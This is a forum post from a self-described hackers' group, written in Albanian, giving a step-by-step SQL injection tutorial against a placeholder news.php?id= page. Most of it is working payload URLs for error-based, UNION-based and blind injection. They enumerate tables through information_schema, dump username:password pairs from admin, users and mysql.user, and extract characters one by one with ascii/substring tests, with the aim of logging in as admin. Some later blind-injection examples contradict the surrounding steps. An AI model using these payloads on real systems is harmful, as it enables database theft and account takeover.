Drenica Hackers GrouP

Drenica Hackers Group
 
ForumForum  Drenica-HackersDrenica-Hackers  PytësoriPytësori  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 SQL Injection

Shko poshtë 
AutoriMesazh
pr0xy g33k
V.I.P
V.I.P
pr0xy g33k

Numri i postimeve : 85
Poenat e Antarit : 243
Thanks : 1
Join date : 26/06/2009
Age : 22
Location : macedonian

MesazhTitulli: SQL Injection   Sat Jun 27, 2009 8:22 pm

Osht ni tutorial i shpjeguar ne detaje. Nqs keni me pyt naj sen , jom i gatshem me ju ndihmu Smile

Ne ket tutorial do tju tregoj se si punon SQL Injectio-ni dhe si ta
perdorim ate qe te marrim disa informata te perdorshme.

Se pari : Qka esht SQL Injection?

Esht nje web aplikacion i thjeshte ne keto dit.
I lejon sulmuesit te nxjerre nga databaza e webit disa informacione
sekrete etj...(shkurt)


1.SQL Injection (e lehte ose e bazuar ne gabime ose qysh dush) Razz

2.Blind SQL Injection (pjese e veshtir)


Te fillojm me nje aksion:D


1). Kontrollo per vulnerability

Te themi se kemi nje site si ky

http://www.site.com/news.php?id=5

Tani qe te testojm a eshte vulnerable(i pamrojtur) i shtojm ' ne fund te url-s
edhe bohet kshtu http://www.site.com/news.php?id=5'

nqs na del nje error si:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
ose diqka e ngjajshme

kjo nenkupton se eshte vulnerable per sql injection Smile

2). Gjej numra e columnave(kolonave)

Qe te gjejme se sa columna kane perdorim shkrimin ORDER BY(urdheron databazen qe te tregoj rezultatet)

Si ta perdorim ate? Veq e rrisim numrin deri sa te na del nje error.

http://www.site.com/news.php?id=5 order by 1/* <-- pa error

http://www.site.com/news.php?id=5 order by 2/* <-- pa error

http://www.site.com/news.php?id=5 order by 3/* <-- pa error

http://www.site.com/news.php?id=5 order by 4/* <-- error (na del nje mesazh si: Unknown column '4' in 'order clause'
ose diqka kshtu)

kjo tregoon se ky site i ka 3 culomna ,sepse ne 4 na dul error.


3). Kontrollo per funksionin UNION

Me UNION ne mund te selektojm me shum te dhena ne nje shkrim SQL.

Pra kemi

http://www.site.com/news.php?id=5 union all select 1,2,3/* (pra ne kemi gjetur se nr i columnave esht 3 ne seksionin 2). )

nqs kemi disa nr. ne faqe, p.sh 1 ose 2 ose 3 at'her UNION punon Smile

4). Gjej versionin e MySQL-s

http://www.site.com/news.php?id=5 union all select 1,2,3/* Shenim: nqs /* nuk punon ose ju dalin disa errora, at'her provoni --

Te themi se e kemi nr.2 ne faqe , tash kontrollokm per versionin
e nderroojm nr.2 me @@vesion ose version() dhe na del diqka si 4.1.33-log ose 5.0.45 ose e ngjajshme.


Duket sikur kjo http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

nqs ju del nje error si "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."


krejt qka na duhet esht funskioni convert()

p.sh

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

ose me hex() dhe unhex()

p.sh

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

dhe na del MySQL versioni Very Happy

5). Te gjejm table dhe column namet

nqs MySQL versioni eshte me i vogel se 5 (i.e 4.1.33, 4.1.12...) <--- me vone do te tregoj MySQL versionet 5 e me lart.
ne duhet me ja qellu ne shum raste column namet Razz.

table namet e zakonshme jan: user/s, admin/s, member/s ...

column namet e zakonshme jan: username, user, usr, user_name, password, pass, passwd, pwd etc...

p.sh munet me ***

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (ne e shohim nr. 2 ne faqe sikur perpara, kjo esht mire Very Happy)

ne e dime table admin eksziston...

tash gjejm column namet.


http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (nqs ju del error provoni column name tjera Smile)

e kemi username te shfaqur ne faqe, p.sh mund te jet admin, ose superadmin etc...

tash kontrollojm column password a ekziston

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (nqs ju del error provoni column name tjera)

ne e shohim passwordin ne hash hash or ose nje tekst te thjesht, nvaret se si eshte e rregulluar databaza Smile

p.sh md5 hash, mysql hash, sha1...

tash e kompletojm shkrimin qe tduket ma mire Smile

per kete perdorim funsionin concat() (i bashkon tdhanat)

p.sh

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

e qita 0x3a, esht hex value for : ( 0x3a eshte hex value per colon)

(ka edhe ni menyr, char(58), ascii value for : )


http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

tash e kemi te shfaqur username:password, p.sh admin:admin ose admin:najhash

kur i keni kto, mundeni mu bo log-in si admin ose ndonje superantar Very Happy (kuptohet qe pasi qe ta keni kriptuar hashin)

nqs smundei me gjet table namen e sigurt, ju gjithmon provojeni mysql.user (default)

ky ka user dhe password columns, pra p.sh mund te jet

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

sikur qe thash me par do te shpjegoj se si te gjejm table dhe column namet
ne MySQL > 5.

per ket na nevoitet information_schema. Kjo mban krejt table-t dhe column-at ne databaze.

qe te gjeme table namet ne perdori table_name dhe information_schema.tables.

p.sh

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

ktu e ndrrojm nr. 2 me table_name qe te gjejm tablen e pare nga information_schema.tables

qe shfaqet. Tash duhet te shtojm LIMIT ne fund te SQL-s qe te nxjerrim krejt tablet.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

e qita 0,1 (te gjejm 1 resultat qe fillon prej 0-os)

per me pa tablen e dyte, ne e rritim limit 0,1 ne limit 1,1

p.sh

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

table e dyte esht e shfaqur.

per tablen e tret e shkrujm limit 2,1

.osh

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

e rrisim deri sa te na del diqka e perdorshme si db_admin, poll_user, auth, auth_user etc... Very Happy

Qe te gjejm column namet metoda esht e njejt.

ktu perdori column_name dhe information_schema.columns

metoda eshte e njejte si ma heret pra munet me *** :


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

columna e par eshte e shfaqur.

e dyta (e rrisim limit 0,1 ne limit 1,1)

p.sh


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

e dyta esht e shfaqur dhe e rrisim deri sa te na del diqka si

username,user,login, password, pass, passwd etc... Very Happy

te themi se i kemi gjetur table namet.

p.sh

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

tash esht e paraqitu column name ne table user. Vetem duke perdor LIMIT-in ne mund te gjejm te gjith columnat ne table user.

Kjo nuk punon nqs thonjezat magjike jan ON.

te themi se i kemi gjetur colums user, pass dhe email.

tash e kompletojm duke i bashku te gjitha se bashku Very Happy

per kta e perdorim concat() , e shpjegova ma lart.

p.sh


http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

krejt qka kemi eshte user:pass:email prej table userit.
p.sh: admin#⃣qyshdush@palidhje.com


Kjo eshte e gjitha per ket pjes, tash mund te kalojm ne pjesen e vshtir Smile2. Blind SQL Injection

Blind injection eshte pak me e komplikume sesa SQL-ja po munet mu kan e mire Very Happy

t'fillojm me punen.

Do ta perdor per shembull

http://www.site.com/news.php?id=5

kur e shkrujm kta, ne shohim disa faqe dhe artikuj ne kete faqe, pictura etc...

dhe deshirojm ta testojm a eshte vulnerable per blind sql injection

http://www.site.com/news.php?id=5 and 1=1 <--- kjo asht gjithmon mire

faqja hapet normal, kjo asht nrregull.

tash testi real

http://www.site.com/news.php?id=5 and 1=2 <--- kjo asht keq

pra nqs naj tekst, pictur ose ndonje gje tjeter esht e humbur ne ket faqe at'her ky site eshte vulnerable per blind
sql injection.

1) Gjejm MySQL versionin

qe te gjejm versionin ne sulmin blind ne perdorim substring

p.sh

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

kjo duhet te jet mire nqs versioni i MySQL-s eshte 4.

ndrrojm 4 me 5, dhe nqs hapet mire at'her versioni i MySQL-s esht 5.

p.sh

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Testoj a punon subselect

kur select nuk punon e perdorim subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

nqs faqja hapet normal at'her subselects punon.

tash shohim a kemi access ne mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

nqs faqja hapet normal ne kemi access tek mysql.user dhe me von ne mund te nxjerrim ndonje password
duke perdorum funksionin load_file() dhe OUTFILE.

3). Gjejm table dhe column name-t

Ne ket pjes duhet me ta marr menja mire Smile

p.sh

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (me limit 0,1 shkrimi jone ketu kthehet 1 radhe nga
tdhanat,
sepse subselect kthehet vetem 1 shkall, kjo eshte shum e rendsishme.)

nqs faqja hapet mire pa humbur asgje kjo tregon se table users ekziston.
nqs na del keq (naj sen humb), vetem ndrrojeni table namen deri tja qelloni Razz

t'themi se e kemi gjetur se table name esht users , tash na duhet column name

e njejta si table name,ne provojm nddonje column name ma tshpeshta (qfar tju merr menja)

p.sh

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

nqs faqja hapet normal ne e dijm se column name esht password (nqs jo at'her provoni t'zakonshmet ose qysh tju merr menja)

tash e bashkojm 1 me columnin password, at;her substring kthehet ne karakteret e para (,1,1)


4). Nxjerrja e te dhenave nga databaza

e kemi gjetur table users dhe columns username password dhe do te nxjerrim tdhana nga.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

Kjo nxjerr shkronjen e par nga useri i par ne databaz.

substring ketu kthehet nga shkronja e 1 ne me te gjat. ascii() converton 1 shkronj ne ascii value

dhe e krahasojm me simbolin me e madhe > .

nqs ascii eshte ma e madhe se 80, faqja hapet normal normal. (MIRE)

e provojm deri sa te na del keq.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

na del MIRE, e rrisim


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

apet MIRE, e rrisim

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

KEQ!!!

pra karakteri i pare ne username eshte char(99). Duket perdorur ascii converter ne e dim se char(99) eshte shkronja 'c'.

ta gjojm te dytin

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

tash e ndrrojm ,1,1 ne ,2,1 qe me gjet shkronjen e dyt. (tash e kthen ne karakterin e 1 ne me te gjat)


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

MIRE, faqja hapet normal, e rrisim.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

KEQ, e zvoglojm.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

MIRE, e rrisim.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

KEQ!!!

ne e dijm ne shkronja e dyte esht char(105) dhe kjo esht 'i'. Kemi 'ci' shum larg

pra e rrisim deri sa te gjejm krejt. (kur >0 rikthehet keq e dime se kemi ardh nfund).


Shpresoj qe keni msu diqka prej kti tutoriali!
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
SQL Injection
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Drenica Hackers GrouP  :: INFORMATIKA :: Tutoriale/Mësime-
Kërce tek: